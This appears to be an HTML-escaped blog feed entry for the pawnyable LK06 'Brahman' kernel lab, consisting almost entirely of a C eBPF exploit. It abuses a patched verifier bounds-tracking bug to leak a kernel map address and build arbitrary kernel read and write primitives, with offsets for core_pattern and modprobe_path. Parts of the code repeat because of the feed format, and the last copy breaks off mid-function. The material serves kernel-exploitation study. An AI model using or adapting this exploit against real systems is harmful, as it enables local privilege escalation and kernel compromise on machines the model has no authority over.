      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
